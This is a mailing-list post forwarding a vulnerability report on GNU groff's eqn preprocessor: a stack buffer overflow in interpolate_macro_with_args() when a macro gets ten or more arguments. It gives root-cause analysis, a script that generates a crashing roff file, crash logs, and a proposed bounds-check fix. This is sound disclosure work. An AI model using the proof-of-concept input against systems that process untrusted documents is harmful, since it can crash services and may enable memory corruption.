This report looks to me like it might be the brother of GNU pic bug
<https://savannah.gnu.org/bugs/?67899>, already fixed in groff 1.24.0.

What do you guys think?

Regards,
Branden

----- Forwarded message from wheat MAX <[email protected]> -----

Date: Wed, 10 Jun 2026 13:58:14 +0800
From: wheat MAX <[email protected]>
To: [email protected]
Message-ID: <cakugowawgupenycvg4w3ghacu2pdkxhrw9puu74wl8zht9o...@mail.gmail.com>
Subject: [BUG] GNU groff 1.24.0: Stack-based buffer overflow (CWE-121) in eqn
 interpolate_macro_with_args() via oversized macro argument list

Hello maintainers, we have discovered a memory bug in the new version of
groff.

# GNU groff 1.24.0: Stack-based buffer overflow (CWE-121) in eqn
interpolate_macro_with_args() via oversized macro argument list

## Summary

- **CWE**: CWE-121 (Stack-based Buffer Overflow)
- **Vendor**: GNU Project
- **Product**: GNU groff (`eqn` preprocessor; reachable through `groff -e`)
- **Affected Version(s)**: GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e` (tested as GNU eqn/groff 1.24.0)
and GNU groff 1.23.0 release (`/usr/bin/eqn` on Ubuntu 24.04)
- **Affected Component(s)**:
  - `src/preproc/eqn/lex.cpp`, `interpolate_macro_with_args()` — parses
comma-separated macro arguments into a fixed-size stack array `char
*argv[9]` without bounds checking, allowing the 10th and later arguments to
be written past the end of the stack array.
  - `src/preproc/eqn/lex.cpp`,
`argument_macro_input::argument_macro_input()` — trusts the unbounded
argument count and copies it into another fixed 9-slot argument array.
- **Attack Type / Vector**: Local file parsing — via a crafted roff/eqn
document containing an `eqn` macro invocation with more than 9
comma-separated arguments.
- **Impact**:
  - Local Denial of Service (crash via stack corruption and `SIGABRT`).
  - Potential code execution on builds without stack-protector mitigations,
because the root cause is an out-of-bounds write of attacker-controlled
pointers past a stack array.

This report is independent from the companion GNU groff `pre-grohtml`
CWE-78 report. They affect different groff components and different attack
surfaces: this issue is a memory-corruption bug in the `eqn` parser, while
the companion report is command injection in the HTML preprocessing
pipeline.

---

## Technical Details / Root Cause

In GNU groff, the `eqn` preprocessor supports user-defined macros inside
`.EQ` / `.EN` equation blocks. A macro can be defined with the `define`
primitive and invoked with a comma-separated argument list. The
vulnerability is in the interaction between macro argument parsing and
fixed-size arrays used to hold those arguments.

The vulnerable path is reached when `get_token()` sees a non-simple macro
followed by an opening parenthesis:

```cpp
if (!quoted && lookup_flag != 0 && c == '(') {
  token_buffer += '\0';
  definition *def = macro_table.lookup(token_buffer.contents());
  if (def && def->is_macro && !def->is_simple) {
    (void)get_char();  // skip initial '('
    interpolate_macro_with_args(def->contents);
    break_flag = 1;
    break;
  }
  token_buffer.set_length(token_buffer.length() - 1);
}
```

A document-controlled macro definition created by `define` is a non-simple
macro (`is_simple == 0`), so a document like the following enters this path:

```roff
.EQ
define foo X x X
foo(z,z,z,z,z,z,z,z,z,z)
.EN
```

The root cause is in `interpolate_macro_with_args()`:

1. **Fixed-size stack array**: `interpolate_macro_with_args()` declares a
stack array with exactly 9 pointer slots:
   ```cpp
   static void interpolate_macro_with_args(const char *body)
   {
     char *argv[9];
     int argc = 0;
     int i;
     for (i = 0; i < 9; i++)
       argv[i] = 0;
     ...
   ```

2. **Unbounded macro-argument parsing loop**: Each parsed argument is
stored in `argv[argc]`, but `argc` is not checked before the store:
   ```cpp
   if (level == 0 && (c == ',' || c == ')')) {
     if (token_buffer.length() > 0) {
       token_buffer +=  '\0';
       argv[argc] = strsave(token_buffer.contents());  // <-- no bounds
check
     }
     // for 'foo()', argc = 0
     if (argc > 0 || c != ')' || i > 0)
       argc++;
     break;
   }
   ```
   `argv[]` has valid indices `0..8`. The 10th macro argument is stored at
`argv[9]`, one pointer past the end of the stack array. Larger argument
counts continue writing attacker-controlled heap pointers farther beyond
the array.

3. **The unbounded count is propagated**: The unbounded `argc` value is
then passed to `argument_macro_input`, which also contains a fixed 9-slot
argument array:
   ```cpp
   class argument_macro_input: public input {
     char *s;
     char *p;
     char *ap;
     int argc;
     char *argv[9];
   public:
     argument_macro_input(const char *, int, char **, input *);
     ~argument_macro_input();
     int get();
     int peek();
   };
   ```
   Its constructor trusts `argc` and copies all supplied argument pointers:
   ```cpp
   argument_macro_input::argument_macro_input(const char *body, int ac,
                                              char **av, input *x)
   : input(x), ap(0), argc(ac)
   {
     int i;
     for (i = 0; i < argc; i++)
       argv[i] = av[i];
     ...
   }
   ```

No length validation exists on this path. The crafted document controls the
number of comma-separated macro arguments, and the 10th argument is
sufficient to overflow the stack array in `interpolate_macro_with_args()`.

---

## Reproduction (PoC)

The crash is reproducible on the default upstream build of GNU groff on
Linux. No sanitizers, valgrind, or instrumentation are required.

```sh
# Create a roff document containing an eqn macro invocation with 50
arguments
python3 - <<'PY' > /tmp/eqn_macro_50.roff
n = 50
print('.EQ')
print('define foo X x X')
print('foo(' + ','.join(['z'] * n) + ')')
print('.EN')
PY

# Invoke the stock eqn binary from a default upstream build
./eqn /tmp/eqn_macro_50.roff >/tmp/eqn.out 2>/tmp/eqn.err
echo "exit=$?"
sed -n '1,3p' /tmp/eqn.err
```

The generated PoC file `/tmp/eqn_macro_50.roff` contains the following eqn
input. This preview shows that the trigger is a normal equation block with
one macro definition and an oversized macro argument list:

```roff
.EQ
define foo X x X
foo(z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z)
.EN
```

Observed result on Ubuntu 24.04 (`gcc 13.3.0`, default `./bootstrap &&
./configure && make`), using GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e`:

```text
GNU eqn (groff) version 1.24.0
exit=134
*** stack smashing detected ***: terminated
```

`exit=134` corresponds to termination by signal `134 - 128 = 6`
(`SIGABRT`). The `*** stack smashing detected ***` diagnostic is emitted by
the stock glibc stack protector after the fixed stack array in
`interpolate_macro_with_args()` is overwritten.

The overflow boundary is exact for the fixed 9-slot array: 9 arguments are
accepted, while the 10th argument overflows the stack array and aborts the
process:

```text
N=9 exit=0
N=10 exit=134
*** stack smashing detected ***: terminated
N=50 exit=134
*** stack smashing detected ***: terminated
```

The same input is also reachable through the normal `groff -e` pipeline:

```sh
./test-groff -e -Tps /tmp/eqn_macro_50.roff >/tmp/groff_pipeline.out
2>/tmp/groff_pipeline.err
echo "groff -e exit=$?"
sed -n '1,6p' /tmp/groff_pipeline.err
```

Observed result:

```text
groff -e exit=8
*** stack smashing detected ***: terminated
/home/zijian/groff_master/groff: error: eqn: Aborted (core dumped)
```

A cross-check against Ubuntu 24.04's system GNU groff 1.23.0 release also
reproduces the same crash:

```text
GNU eqn (groff) version 1.23.0
system eqn exit=134
*** stack smashing detected ***: terminated
```

---

## Fix / Mitigation

In `interpolate_macro_with_args()`, either reject excessive macro arguments
before writing into `argv[argc]`, or replace the fixed-size arrays with
dynamically grown storage. Since eqn macro parameters are referenced only
as `$1` through `$9`, rejecting the 10th and later arguments is the
simplest safe behavior.

Sketch of a fix:

```cpp
if (token_buffer.length() > 0) {
  if (argc >= 9) {
    lex_error("too many arguments in macro invocation");
    // Discard remaining arguments up to the matching ')' and free any
    // already allocated argv[] entries before returning.
    return;
  }
  token_buffer += '\0';
  argv[argc] = strsave(token_buffer.contents());
}
```

The constructor of `argument_macro_input` should also defensively cap or
validate `ac` before copying into its own `argv[9]` member array.

### Recommended Mitigations

- **Preferred**: Apply an upstream patch that bounds `argc` before every
write to `argv[argc]` in `interpolate_macro_with_args()` and before every
copy into `argument_macro_input::argv`.
- If patching is not immediately possible:
  - Avoid running `eqn` or `groff -e` on untrusted roff documents, or
  - Sandbox the `eqn` / `groff -e` pipeline when processing untrusted
documents.

Thank you.

----- End forwarded message -----

Attachment: signature.asc
Description: PGP signature

Reply via email to